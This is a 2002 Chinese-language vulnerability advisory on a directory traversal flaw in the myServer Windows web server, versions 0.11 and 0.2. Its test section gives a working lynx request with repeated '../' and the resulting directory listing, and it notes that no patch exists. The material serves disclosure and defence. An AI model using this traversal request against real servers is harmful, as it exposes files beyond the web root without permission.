myServer Web服务程序远程目录遍历漏洞
发布日期:2002-12-11
更新日期:2002-12-13
受影响系统:myServer myServer 0.11
myServer myServer 0.2
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000
描述:
myServer是一款使用于Windows操作系统下的小型HTTP服务程序。
myServer服务程序没有充分过滤用户提交的'../'字符,远程攻击者可以利用这个漏洞进行目录遍历攻击。
攻击者可以提交参数中包含多个'../'字符的URI请求,可以绕过WEB ROOT目录限制,遍历系统目录,以WEB权限查看系统任意敏感文件。
<*来源:dong-h0un U (
xploit@hackermail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103962587025589&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
dong-h0un U (
xploit@hackermail.com)提供了如下测试方法:
bash$ lynx -dump
http://myServerhost/../../myServerEXEC-0.2 > x82-x0x
bash$ cat x82-x0x
Contents of folder ../../myServerEXEC-0.2/
_________________________________________________________________
File Last modify Size
[1]cgi-lib 0/11/102-12:4:16 System time
[2]control.exe 3/11/102-10:48:28 System time 258048 bytes
[3]CVS 0/11/102-12:4:18 System time
[4]languages 0/11/102-12:4:18 System time
[5]libhoard.dll 3/9/102-6:0:0 System time 32843 bytes
[6]logs 0/11/102-12:4:18 System time
[7]MIMEtypes.txt 0/11/102-3:50:42 System time 276 bytes
[8]myserver.exe 3/11/102-10:49:2 System time 200704 bytes
[9]myserver.xml 0/11/102-1:11:46 System time 2238 bytes
[10]readme.txt 0/11/102-9:59:6 System time 1836 bytes
[11]REGISTER SERVICE.bat 3/9/102-6:0:0 System time 20 bytes
[12]START CONSOLE.bat 3/9/102-6:0:0 System time 20 bytes
[13]START SERVICE.bat 3/9/102-6:0:0 System time 17 bytes
[14]STOP SERVICE.bat 3/9/102-6:0:0 System time 16 bytes
[15]system 0/11/102-12:4:18 System time
[16]UNREGISTER SERVICE.bat 3/9/102-6:0:0 System time 22 bytes
[17]web 0/11/102-12:4:18 System time
_________________________________________
建议:
厂商补丁:
myServer
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://myserverweb.sourceforge.net/浏览次数:3560
严重程度:0(网友投票)